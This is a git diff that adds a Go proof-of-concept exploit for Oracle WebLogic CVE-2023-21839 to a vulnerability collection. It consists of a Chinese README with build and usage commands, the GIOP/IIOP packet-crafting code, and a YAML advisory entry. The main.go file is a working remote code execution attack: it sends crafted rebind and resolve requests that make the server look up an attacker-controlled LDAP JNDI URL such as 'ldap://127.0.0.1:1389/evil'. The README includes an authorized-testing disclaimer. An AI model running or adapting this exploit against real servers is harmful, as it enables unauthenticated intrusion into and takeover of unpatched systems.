diff --git a/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/README.md b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/README.md new file mode 100644 index 0000000000000000000000000000000000000000..5707d6b0de712761771917f68e87c97ed9c60848 --- /dev/null +++ b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/README.md @@ -0,0 +1,53 @@ +## CVE-2023-21839 + +**未经授权许可使用本项目攻击或测试目标是非法的,本程序应仅用于授权的安全测试与研究目的** + +### 介绍 + +这是来自长亭`xray`的代码,该漏洞扫描已集成到新版`xray`中,敬请期待 + +Weblogic CVE-2023-21839 RCE + +(1)**无需任何 Java 依赖,构造协议通过socket直接RCE** + +(2)已解决 IIOP 的 NAT 网络问题(可测试 Docker 与公网目标) + +(3)在 Windows/Mac OS/Linux 以及 Weblogic 12/14 中测试通过 + +(4)请使用 JDK 8u191 以下启动 Weblogic 并自行搭建 JNDI Server + +### 使用 + +你可以通过 vulhub 复现:[链接](https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2023-21839) + +Linux/Mac OS + +```shell +cd cmd +go build -o CVE-2023-21839 +./CVE-2023-21839 -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil +``` + +Windows + +```shell +cd cmd +go build -o CVE-2023-21839.exe +CVE-2023-21839.exe -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil +``` + +如果发现 panic 或有其他报错,说明目标不存在漏洞(或关闭了 IIOP 功能) + +本地测试: + +![](img/rce.png) + +某师傅公网测试: + +![](img/pub.png) + +### 免责声明 + +此工具仅作为网络安全攻防研究交流,请使用者遵照网络安全法合理使用! + +如果使用者使用该工具出现任何非法攻击等违法行为,与作者无关! diff --git a/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/cmd/main.go b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/cmd/main.go new file mode 100644 index 0000000000000000000000000000000000000000..6fe5dc3a00b2e19ea9837528faf8621e47336fd9 --- /dev/null +++ b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/cmd/main.go @@ -0,0 +1,377 @@ +package main + +import ( + "CVE-2023-21839" + "encoding/binary" + "encoding/hex" + "flag" + "fmt" + "net" + "strings" +) + +var ( + hostConfig string + portConfig int + ldapConfig string +) + +var ( + key1 string + key2 string + key3 string + wlsKey1 string + wlsKey2 string +) + +var ( + ServiceContext0 = &giop.ServiceContext{ + VSCID: giop.D("000000"), + SCID: giop.D("05"), + Endianness: []byte{giop.BigEndianType}, + Data: giop.D("000000000000010000000d3137322e32362e3131322e310000ec5b"), + } + ServiceContext1 = &giop.ServiceContext{ + VSCID: giop.D("000000"), + SCID: giop.D("01"), + Endianness: []byte{giop.BigEndianType}, + Data: giop.D("0000000001002005010001"), + } + ServiceContext2 = &giop.ServiceContext{ + VSCID: giop.D("424541"), + SCID: giop.D("00"), + Endianness: []byte{giop.BigEndianType}, + Data: giop.D("0a0301"), + } +) + +func main() { + flag.StringVar(&hostConfig, "ip", "", "ip") + flag.IntVar(&portConfig, "port", 7001, "port") + flag.StringVar(&ldapConfig, "ldap", "", "ldap") + flag.Parse() + + if hostConfig == "" || ldapConfig == "" { + fmt.Println("Weblogic CVE-2023-21839") + flag.Usage() + return + } + + if !strings.HasPrefix(ldapConfig, "ldap") { + fmt.Println("Weblogic CVE-2023-21839") + flag.Usage() + } + + fmt.Printf("[*] your-ip: %s\n", hostConfig) + fmt.Printf("[*] your-port: %d\n", portConfig) + fmt.Printf("[*] your-ldap: %s\n", ldapConfig) + + vp := "743320392e322e302e300a41533a3235350a484c3a39320a4d5" + + "33a31303030303030300a50553a74333a2f2f746573743a373030310a0a" + ver := giop.GetVersion(hostConfig, vp, portConfig) + if ver == "12" { + fmt.Println("[*] weblogic 12") + wlsKey1 = "00424541080103000000000c41646d696e53657276657200000000000000003349" + + "444c3a7765626c6f6769632f636f7262612f636f732f6e616d696e672f4e616d696e6743" + + "6f6e74657874416e793a312e3000000000000238000000000000014245412c0000001000" + + "00000000000000{{key1}}" + wlsKey2 = "00424541080103000000000c41646d696e53657276657200000000000000003349" + + "444c3a7765626c6f6769632f636f7262612f636f732f6e616d696e672f4e616d696e6743" + + "6f6e74657874416e793a312e30000000000004{{key3}}000000014245412c0000001000" + + "00000000000000{{key1}}" + } else if ver == "14" { + fmt.Println("[*] weblogic 14") + wlsKey1 = "00424541080103000000000c41646" + + "d696e53657276657200000000000000003349444c3a7765626c" + + "6f6769632f636f7262612f636f732f6e616d696e672f4e616d6" + + "96e67436f6e74657874416e793a312e30000000000002380000" + + "00000000014245412e000000100000000000000000{{key1}}" + wlsKey2 = "00424541080103000000000c41646d696e53657276657" + + "200000000000000003349444c3a7765626c6f6769632f636f72" + + "62612f636f732f6e616d696e672f4e616d696e67436f6e74657" + + "874416e793a312e30000000000004{{key3}}00000001424541" + + "2e000000100000000000000000{{key1}}" + } else { + fmt.Println("[!] error and exit") + } + + host := hostConfig + port := portConfig + conn, err := net.Dial("tcp", fmt.Sprintf("%s:%d", host, port)) + rmi := ldapConfig + // [ldap len] [ldap string] + ldap := hex.EncodeToString([]byte{byte(len(rmi))}) + ldap += hex.EncodeToString([]byte(rmi)) + if err != nil { + return + } + + locateRequest := &giop.LocateRequest{ + Header: &giop.Header{ + Magic: giop.D(giop.GIOP), + MajorVersion: []byte{giop.MajorVersion}, + MinorVersion: []byte{giop.MinorVersion}, + MessageFlags: []byte{giop.BigEndianType}, + MessageType: []byte{giop.LocateRequestType}, + }, + RequestId: giop.Int32(2), + TargetAddress: giop.D(giop.KeyAddr), + KeyAddress: giop.D(giop.NameService), + } + + giop.Log(2, "LocateRequest") + _, _ = conn.Write(locateRequest.Bytes()) + buf := make([]byte, 1024*10) + _, _ = conn.Read(buf) + + temp1 := make([]byte, 8) + temp2 := make([]byte, 8) + + // GIOP Header + // IOR Prefix + iOff := 0x60 + for buf[iOff] != 0x00 { + // ProfileHost + iOff++ + } + if iOff > 1024*10 { + return + } + for buf[iOff] == 0x00 { + iOff++ + } + p := make([]byte, 2) + p[0] = buf[iOff] + iOff++ + p[1] = buf[iOff] + + tempPort := int(binary.BigEndian.Uint16(p)) + + if tempPort != port { + return + } + + lt := iOff - 0x60 + fOff := 0x60 + lt + 0x75 + // other cases + for buf[fOff] == 0x00 { + fOff++ + } + + // Fake ObjectKey1 + copy(temp1[0:8], buf[fOff:fOff+8]) + copy(temp2[4:8], buf[fOff+4:fOff+8]) + // Fake ObjectKey2 + copy(temp2[0:4], []byte{0xff, 0xff, 0xff, 0xff}) + key1 = giop.E(temp1) + key2 = giop.E(temp2) + + wlsKey1 = strings.ReplaceAll(wlsKey1, "{{key1}}", key1) + + rebindAny := &giop.RebindRequest{ + Header: &giop.Header{ + Magic: giop.D(giop.GIOP), + MajorVersion: []byte{giop.MajorVersion}, + MinorVersion: []byte{giop.MinorVersion}, + MessageFlags: []byte{giop.BigEndianType}, + MessageType: []byte{giop.RequestType}, + }, + RequestId: giop.Int32(3), + ResponseFlags: []byte{giop.WithTargetScope}, + TargetAddress: giop.D(giop.KeyAddr), + KeyAddress: giop.D(wlsKey1), + RequestOperation: giop.D(giop.RebindAnyOp), + ServiceContextList: &giop.ServiceContextList{ + SequenceLength: giop.Int32(6), + ServiceContext: []*giop.ServiceContext{ + ServiceContext0, + ServiceContext1, + { + VSCID: giop.D("000000"), + SCID: giop.D("06"), + Endianness: []byte{giop.BigEndianType}, + Data: giop.D("0000000000002849444c3a6f6d672e6f72672f53656e64696e67436" + + "f6e746578742f436f6465426173653a312e30000000000100000000000000b8000102000000000" + + "d3137322e32362e3131322e310000ec5b000000640042454108010300000000010000000000000" + + "0000000002849444c3a6f6d672e6f72672f53656e64696e67436f6e746578742f436f646542617" + + "3653a312e30000000000331320000000000014245412a0000001000000000000000005eedafdeb" + + "c0d227000000001000000010000002c00000000000100200000000300010020000100010501000" + + "10001010000000003000101000001010905010001"), + }, + { + VSCID: giop.D("000000"), + SCID: giop.D("0f"), + Endianness: []byte{giop.BigEndianType}, + Data: giop.D("00000000000000000000000000000100000000000000000100000000000000"), + }, + { + VSCID: giop.D("424541"), + SCID: giop.D("03"), + Endianness: []byte{giop.BigEndianType}, + Data: giop.D("00000000000000" + key2 + "00000000"), + }, + ServiceContext2, + }, + }, + StubData: giop.D("0000000000000001000000047465737400000001000000000000001d0000001c00000000000000010" + + "0000000000000010000000000000000000000007fffff0200000054524d493a7765626c6f6769632e6a6e64692e69" + + "6e7465726e616c2e466f726569676e4f70617175655265666572656e63653a4432333744393143423246304636384" + + "13a3344323135323746454435393645463100000000007fffff020000002349444c3a6f6d672e6f72672f434f5242" + + "412f57537472696e6756616c75653a312e300000000000" + ldap), + } + + giop.Log(3, "RebindRequest") + _, _ = conn.Write(rebindAny.Bytes()) + buf = make([]byte, 1024*10) + _, _ = conn.Read(buf) + + startOff := 0x64 + lt + 0xc0 + len(host) + // SendingContextRuntime + 0xac + lt + // IOR ProfileHost ProfilePort + 0x5d // ObjectKey Prefix + for buf[startOff] != 0x32 { + if startOff > 0x2710 { + break + } + // InternalKey Offset + startOff++ + } + + if startOff > 0x2710 { + key3 = giop.E([]byte{0x32, 0x38, 0x39, 0x00}) + } else { + key3 = giop.E(buf[startOff : startOff+4]) + } + + wlsKey2 = strings.ReplaceAll(wlsKey2, "{{key3}}", key3) + wlsKey2 = strings.ReplaceAll(wlsKey2, "{{key1}}", key1) + + rebindAnyTwice := &giop.RebindRequest{ + Header: &giop.Header{ + Magic: giop.D(giop.GIOP), + MajorVersion: []byte{giop.MajorVersion}, + MinorVersion: []byte{giop.MinorVersion}, + MessageFlags: []byte{giop.BigEndianType}, + MessageType: []byte{giop.RequestType}, + }, + RequestId: giop.Int32(4), + ResponseFlags: []byte{giop.WithTargetScope}, + TargetAddress: giop.D(giop.KeyAddr), + KeyAddress: giop.D(wlsKey2), + RequestOperation: giop.D(giop.RebindAnyOp), + ServiceContextList: &giop.ServiceContextList{ + SequenceLength: giop.Int32(4), + ServiceContext: []*giop.ServiceContext{ + ServiceContext0, + ServiceContext1, + { + VSCID: giop.D("424541"), + SCID: giop.D("03"), + Endianness: []byte{giop.BigEndianType}, + Data: giop.D("00000000000000" + key2 + "00000000"), + }, + ServiceContext2, + }, + }, + StubData: giop.D("00000001000000047465737400000001000000000000001d0000001c00000000000000010" + + "0000000000000010000000000000000000000007fffff0200000054524d493a7765626c6f6769632e6a6e64692e69" + + "6e7465726e616c2e466f726569676e4f70617175655265666572656e63653a4432333744393143423246304636384" + + "13a3344323135323746454435393645463100000000007fffff020000002349444c3a6f6d672e6f72672f434f5242" + + "412f57537472696e6756616c75653a312e300000000000" + ldap), + } + + giop.Log(4, "RebindRequest") + _, _ = conn.Write(rebindAnyTwice.Bytes()) + buf = make([]byte, 1024*10) + _, _ = conn.Read(buf) + + locateRequest2 := &giop.LocateRequest{ + Header: &giop.Header{ + Magic: giop.D(giop.GIOP), + MajorVersion: []byte{giop.MajorVersion}, + MinorVersion: []byte{giop.MinorVersion}, + MessageFlags: []byte{giop.BigEndianType}, + MessageType: []byte{giop.LocateRequestType}, + }, + RequestId: giop.Int32(5), + TargetAddress: giop.D(giop.KeyAddr), + KeyAddress: giop.D(giop.NameService), + } + + giop.Log(5, "LocateRequest") + _, _ = conn.Write(locateRequest2.Bytes()) + buf = make([]byte, 1024*10) + _, _ = conn.Read(buf) + + resolve := &giop.ResolveRequest{ + Header: &giop.Header{ + Magic: giop.D(giop.GIOP), + MajorVersion: []byte{giop.MajorVersion}, + MinorVersion: []byte{giop.MinorVersion}, + MessageFlags: []byte{giop.BigEndianType}, + MessageType: []byte{giop.RequestType}, + }, + RequestId: giop.Int32(6), + ResponseFlags: []byte{giop.WithTargetScope}, + TargetAddress: giop.D(giop.KeyAddr), + KeyAddress: giop.D(wlsKey1), + RequestOperation: giop.D(giop.ResolveOp), + ServiceContextList: &giop.ServiceContextList{ + SequenceLength: giop.Int32(4), + ServiceContext: []*giop.ServiceContext{ + ServiceContext0, + ServiceContext1, + { + VSCID: giop.D("424541"), + SCID: giop.D("03"), + Endianness: []byte{giop.BigEndianType}, + Data: giop.D("00000000000000" + key2 + "00000000"), + }, + ServiceContext2, + }, + }, + CosNamingDissector: giop.D("00000000000000010000000574657374000000000000000100"), + } + giop.Log(6, "ResolveRequest") + _, _ = conn.Write(resolve.Bytes()) + buf = make([]byte, 1024*10) + _, _ = conn.Read(buf) + + resolveTwice := &giop.ResolveRequest{ + Header: &giop.Header{ + Magic: giop.D(giop.GIOP), + MajorVersion: []byte{giop.MajorVersion}, + MinorVersion: []byte{giop.MinorVersion}, + MessageFlags: []byte{giop.BigEndianType}, + MessageType: []byte{giop.RequestType}, + }, + RequestId: giop.Int32(7), + ResponseFlags: []byte{giop.WithTargetScope}, + TargetAddress: giop.D(giop.KeyAddr), + KeyAddress: giop.D(wlsKey2), + RequestOperation: giop.D(giop.ResolveOp), + ServiceContextList: &giop.ServiceContextList{ + SequenceLength: giop.Int32(4), + ServiceContext: []*giop.ServiceContext{ + ServiceContext0, + ServiceContext1, + { + VSCID: giop.D("424541"), + SCID: giop.D("03"), + Endianness: []byte{giop.BigEndianType}, + Data: giop.D("00000000000000" + key2 + "00000000"), + }, + ServiceContext2, + }, + }, + CosNamingDissector: giop.D("00000000000000010000000574657374000000000000000100"), + } + giop.Log(7, "ResolveRequest") + _, _ = conn.Write(resolveTwice.Bytes()) + buf = make([]byte, 1024*10) + _, _ = conn.Read(buf) + + err = conn.Close() + if err != nil { + fmt.Println(err) + } +} diff --git a/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/constant.go b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/constant.go new file mode 100644 index 0000000000000000000000000000000000000000..8b41638888a5885c99491bd0f22ae74b8649bc73 --- /dev/null +++ b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/constant.go @@ -0,0 +1,22 @@ +package giop + +const ( + GIOP = "47494f50" + + BigEndianType = 0x00 + + RequestType = 0x00 + LocateRequestType = 0x03 + + KeyAddr = "0000" + + NameService = "4e616d6553657276696365" + + MajorVersion = 0x01 + MinorVersion = 0x02 + + WithTargetScope = 0x03 + + RebindAnyOp = "726562696e645f616e79" + ResolveOp = "7265736f6c7665" +) diff --git a/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/giop.go b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/giop.go new file mode 100644 index 0000000000000000000000000000000000000000..f79865f67ebadcd35825aec50aa63b7129dd5ffb --- /dev/null +++ b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/giop.go @@ -0,0 +1,21 @@ +package giop + +import ( + "encoding/binary" + "encoding/hex" +) + +func D(str string) []byte { + data, _ := hex.DecodeString(str) + return data +} + +func E(b []byte) string { + return hex.EncodeToString(b) +} + +func Int32(i int) []byte { + b := make([]byte, 4) + binary.BigEndian.PutUint32(b, uint32(i)) + return b +} diff --git a/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/go.mod b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/go.mod new file mode 100644 index 0000000000000000000000000000000000000000..3a76572a7ccb1092cf11804b5d1513bd16dee5be --- /dev/null +++ b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/go.mod @@ -0,0 +1,3 @@ +module CVE-2023-21839 + +go 1.19 diff --git a/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/header.go b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/header.go new file mode 100644 index 0000000000000000000000000000000000000000..16ea4251bfadb5f4ad8eae6767c122f0c3390b43 --- /dev/null +++ b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/header.go @@ -0,0 +1,12 @@ +package giop + +// Header +// GIOP Header +type Header struct { + Magic []byte // 4 + MajorVersion []byte // 1 + MinorVersion []byte // 1 + MessageFlags []byte // 1 + MessageType []byte // 1 + _messageSize []byte // 4 +} diff --git a/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/img/pub.png b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/img/pub.png new file mode 100644 index 0000000000000000000000000000000000000000..c7d7d03691e8d51ca0ac1882d2186b552ffc4872 Binary files /dev/null and b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/img/pub.png differ diff --git a/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/img/rce.png b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/img/rce.png new file mode 100644 index 0000000000000000000000000000000000000000..b7291ce57f8f586a7bd144b58fdee26e14e9e6be Binary files /dev/null and b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/img/rce.png differ diff --git a/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/locate_request.go b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/locate_request.go new file mode 100644 index 0000000000000000000000000000000000000000..4e70b774975c893b33042ca13a7c070bd695cb1e --- /dev/null +++ b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/locate_request.go @@ -0,0 +1,56 @@ +package giop + +import ( + "bytes" + "encoding/binary" +) + +type LocateRequest struct { + Header *Header + RequestId []byte // 4 + TargetAddress []byte // 2 + _reserved []byte // 2 + _keyAddressLength []byte // 4 + KeyAddress []byte // _keyAddressLength +} + +func (l *LocateRequest) getMessageSize() int { + total := 0 + // RequestID + total += 4 + // TargetAddress + total += 2 + // _reserved + total += 2 + // _keyAddressLength + total += 4 + // KeyAddress + total += len(l.KeyAddress) + return total +} + +func (l *LocateRequest) Bytes() []byte { + buf := &bytes.Buffer{} + + l._reserved = []byte{0x00, 0x00} + + buf.Write(l.Header.Magic) + buf.Write(l.Header.MajorVersion) + buf.Write(l.Header.MinorVersion) + buf.Write(l.Header.MessageFlags) + buf.Write(l.Header.MessageType) + sizeByte := make([]byte, 4) + size := l.getMessageSize() + binary.BigEndian.PutUint32(sizeByte, uint32(size)) + buf.Write(sizeByte) + + buf.Write(l.RequestId) + buf.Write(l.TargetAddress) + buf.Write(l._reserved) + keyLen := make([]byte, 4) + binary.BigEndian.PutUint32(keyLen, uint32(len(l.KeyAddress))) + buf.Write(keyLen) + buf.Write(l.KeyAddress) + + return buf.Bytes() +} diff --git a/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/log.go b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/log.go new file mode 100644 index 0000000000000000000000000000000000000000..511dc383dbeb0ed768a95a4d9ee75e5afb69abab --- /dev/null +++ b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/log.go @@ -0,0 +1,7 @@ +package giop + +import "fmt" + +func Log(i int, s string) { + fmt.Printf("[*] id=%d %s\n", i, s) +} diff --git a/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/rebind_request.go b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/rebind_request.go new file mode 100644 index 0000000000000000000000000000000000000000..5135340824e40d68fd970e598eb4781dc769af6d --- /dev/null +++ b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/rebind_request.go @@ -0,0 +1,120 @@ +package giop + +import ( + "bytes" + "encoding/binary" +) + +type RebindRequest struct { + Header *Header + RequestId []byte // 4 + ResponseFlags []byte // 1 + _reserved1 []byte // 3 + TargetAddress []byte // 2 + _reserved2 []byte // 2 + _keyAddressLength []byte // 4 + KeyAddress []byte // _keyAddressLength + _operationLength []byte // 4 + RequestOperation []byte // _operationLength + _reserved3 []byte // 2 + ServiceContextList *ServiceContextList + StubData []byte // no limit +} + +// GetMessageSize +// get size from a GIOP struct +func (r *RebindRequest) GetMessageSize() int { + total := 0 + // RequestID + total += 4 + // ResponseFlags + total += 1 + // _reserved1 + total += 3 + // TargetAddress + total += 2 + // _reserved2 + total += 2 + // _keyAddressLength + total += 4 + // KeyAddress + total += len(r.KeyAddress) + // _operationLength + total += 4 + // RequestOperation + total += len(r.RequestOperation) + // _reserved3 + total += 2 + // ServiceContext length + total += 4 + slu := binary.BigEndian.Uint32(r.ServiceContextList.SequenceLength) + sl := int(slu) + // ServiceContext + for i := 0; i < sl; i++ { + // VSCID + total += 3 + // SCID + total += 1 + // _sequenceLength + total += 4 + // Endianness + total += 1 + // Data + total += len(r.ServiceContextList.ServiceContext[i].Data) + } + // StubData + total += len(r.StubData) + return total +} + +// Bytes +// get bytes data from a GIOP struct +func (r *RebindRequest) Bytes() []byte { + buf := &bytes.Buffer{} + + r._reserved1 = []byte{0x00, 0x00, 0x00} + r._reserved2 = []byte{0x00, 0x00} + r._reserved3 = []byte{0x00, 0x00} + + buf.Write(r.Header.Magic) + buf.Write(r.Header.MajorVersion) + buf.Write(r.Header.MinorVersion) + buf.Write(r.Header.MessageFlags) + buf.Write(r.Header.MessageType) + sizeByte := make([]byte, 4) + size := r.GetMessageSize() + binary.BigEndian.PutUint32(sizeByte, uint32(size)) + buf.Write(sizeByte) + + buf.Write(r.RequestId) + buf.Write(r.ResponseFlags) + buf.Write(r._reserved1) + buf.Write(r.TargetAddress) + buf.Write(r._reserved2) + keyLen := make([]byte, 4) + binary.BigEndian.PutUint32(keyLen, uint32(len(r.KeyAddress))) + buf.Write(keyLen) + buf.Write(r.KeyAddress) + opLen := make([]byte, 4) + binary.BigEndian.PutUint32(opLen, uint32(len(r.RequestOperation)+1)) + buf.Write(opLen) + buf.Write(r.RequestOperation) + buf.Write(r._reserved3) + + slu := binary.BigEndian.Uint32(r.ServiceContextList.SequenceLength) + sl := int(slu) + buf.Write(r.ServiceContextList.SequenceLength) + for i := 0; i < sl; i++ { + buf.Write(r.ServiceContextList.ServiceContext[i].VSCID) + buf.Write(r.ServiceContextList.ServiceContext[i].SCID) + cdLen := make([]byte, 4) + binary.BigEndian.PutUint32(cdLen, uint32( + len(r.ServiceContextList.ServiceContext[i].Data)+1)) + buf.Write(cdLen) + buf.Write(r.ServiceContextList.ServiceContext[i].Endianness) + buf.Write(r.ServiceContextList.ServiceContext[i].Data) + } + buf.Write(r.StubData) + + return buf.Bytes() +} diff --git a/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/resolve_request.go b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/resolve_request.go new file mode 100644 index 0000000000000000000000000000000000000000..53651f53914c05655fb27ba630ca60448d689a32 --- /dev/null +++ b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/resolve_request.go @@ -0,0 +1,120 @@ +package giop + +import ( + "bytes" + "encoding/binary" +) + +type ResolveRequest struct { + Header *Header + RequestId []byte // 4 + ResponseFlags []byte // 1 + _reserved1 []byte // 3 + TargetAddress []byte // 2 + _reserved2 []byte // 2 + _keyAddressLength []byte // 4 + KeyAddress []byte // _keyAddressLength + _operationLength []byte // 4 + RequestOperation []byte // _operationLength + _reserved3 []byte // 1 + ServiceContextList *ServiceContextList + CosNamingDissector []byte // no limit +} + +// GetMessageSize +// get size from a GIOP struct +func (r *ResolveRequest) GetMessageSize() int { + total := 0 + // RequestID + total += 4 + // ResponseFlags + total += 1 + // _reserved1 + total += 3 + // TargetAddress + total += 2 + // _reserved2 + total += 2 + // _keyAddressLength + total += 4 + // KeyAddress + total += len(r.KeyAddress) + // _operationLength + total += 4 + // RequestOperation + total += len(r.RequestOperation) + // _reserved3 + total += 1 + // ServiceContext length + total += 4 + slu := binary.BigEndian.Uint32(r.ServiceContextList.SequenceLength) + sl := int(slu) + // ServiceContext + for i := 0; i < sl; i++ { + // VSCID + total += 3 + // SCID + total += 1 + // _sequenceLength + total += 4 + // Endianness + total += 1 + // Data + total += len(r.ServiceContextList.ServiceContext[i].Data) + } + // StubData + total += len(r.CosNamingDissector) + return total +} + +// Bytes +// get bytes data from a GIOP struct +func (r *ResolveRequest) Bytes() []byte { + buf := &bytes.Buffer{} + + r._reserved1 = []byte{0x00, 0x00, 0x00} + r._reserved2 = []byte{0x00, 0x00} + r._reserved3 = []byte{0x00} + + buf.Write(r.Header.Magic) + buf.Write(r.Header.MajorVersion) + buf.Write(r.Header.MinorVersion) + buf.Write(r.Header.MessageFlags) + buf.Write(r.Header.MessageType) + sizeByte := make([]byte, 4) + size := r.GetMessageSize() + binary.BigEndian.PutUint32(sizeByte, uint32(size)) + buf.Write(sizeByte) + + buf.Write(r.RequestId) + buf.Write(r.ResponseFlags) + buf.Write(r._reserved1) + buf.Write(r.TargetAddress) + buf.Write(r._reserved2) + keyLen := make([]byte, 4) + binary.BigEndian.PutUint32(keyLen, uint32(len(r.KeyAddress))) + buf.Write(keyLen) + buf.Write(r.KeyAddress) + opLen := make([]byte, 4) + binary.BigEndian.PutUint32(opLen, uint32(len(r.RequestOperation)+1)) + buf.Write(opLen) + buf.Write(r.RequestOperation) + buf.Write(r._reserved3) + + slu := binary.BigEndian.Uint32(r.ServiceContextList.SequenceLength) + sl := int(slu) + buf.Write(r.ServiceContextList.SequenceLength) + for i := 0; i < sl; i++ { + buf.Write(r.ServiceContextList.ServiceContext[i].VSCID) + buf.Write(r.ServiceContextList.ServiceContext[i].SCID) + cdLen := make([]byte, 4) + binary.BigEndian.PutUint32(cdLen, uint32( + len(r.ServiceContextList.ServiceContext[i].Data)+1)) + buf.Write(cdLen) + buf.Write(r.ServiceContextList.ServiceContext[i].Endianness) + buf.Write(r.ServiceContextList.ServiceContext[i].Data) + } + buf.Write(r.CosNamingDissector) + + return buf.Bytes() +} diff --git a/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/service_context.go b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/service_context.go new file mode 100644 index 0000000000000000000000000000000000000000..f011ee26f6a41929a8ee07439982187cc0fe1ba3 --- /dev/null +++ b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/service_context.go @@ -0,0 +1,18 @@ +package giop + +// ServiceContextList +// IIOP ServiceContextList +type ServiceContextList struct { + SequenceLength []byte // 4 + ServiceContext []*ServiceContext // SequenceLength +} + +// ServiceContext +// IIOP ServiceContext +type ServiceContext struct { + VSCID []byte // 3 + SCID []byte // 1 + _sequenceLength []byte // 4 + Endianness []byte // 1 + Data []byte // _sequenceLength-1 +} diff --git a/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/version.go b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/version.go new file mode 100644 index 0000000000000000000000000000000000000000..633530a38fda758f87e60c076300f10cf4114bd8 --- /dev/null +++ b/cve/weblogic/2023/CVE-2023-21839/CVE-2023-21839-master/version.go @@ -0,0 +1,29 @@ +package giop + +import ( + "encoding/hex" + "fmt" + "net" +) + +func GetVersion(host, vp string, port int) string { + conn, err := net.Dial("tcp", fmt.Sprintf("%s:%d", host, port)) + if err != nil { + return "" + } + payload, err := hex.DecodeString(vp) + if err != nil { + return "" + } + _, err = conn.Write(payload) + if err != nil { + return "" + } + buf := make([]byte, 1024) + _, _ = conn.Read(buf) + ver := buf[5:7] + if ver[0] == 0x00 || ver[1] == 0x00 { + return "" + } + return string(ver) +} diff --git a/cve/weblogic/2023/yaml/CVE-2023-21839.yaml b/cve/weblogic/2023/yaml/CVE-2023-21839.yaml new file mode 100644 index 0000000000000000000000000000000000000000..8359e52f00536fbf8d1b2673eb9679e2cd350638 --- /dev/null +++ b/cve/weblogic/2023/yaml/CVE-2023-21839.yaml @@ -0,0 +1,19 @@ +id: CVE-2023-21839 +source: https://github.com/4ra1n/CVE-2023-21839.git +info: + name: Oracle WebLogic 是一款用于开发、部署和运行企业应用程序的可扩展平台。 + severity: critical + description: | + Oracle WebLogic 受影响版本存在远程代码执行漏洞,未经身份验证的攻击者可通过 T3、IIOP 进行网络访问来获取对关键数据的未授权访问或对所有 Oracle WebLogic Server 可访问数据的完全访问。 + scope-of-influence: + Oracle WebLogic Server@[12.2.1.3, 14c(14.1.1.0)) + reference: + - https://www.oracle.com/security-alerts/cpujan2023.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-21839 + cwe-id: CWE-502 + cnvd-id:None + kve-id:None + tags: 数据泄露,传输被破坏,服务器失陷 \ No newline at end of file diff --git a/other_list.yaml b/other_list.yaml index 8f7ee8353f76c96f302356cad99b94a9239dfcc9..91a1a92cc0e3c0ba6f0bd0a43e319044e6accf28 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -39,6 +39,9 @@ cve: - CVE-2019-14287 MinIO: - CVE-2023-28432 + WebLogic: + - CVE-2023-21839 Node.js: - CVE-2021-21315 cnvd: +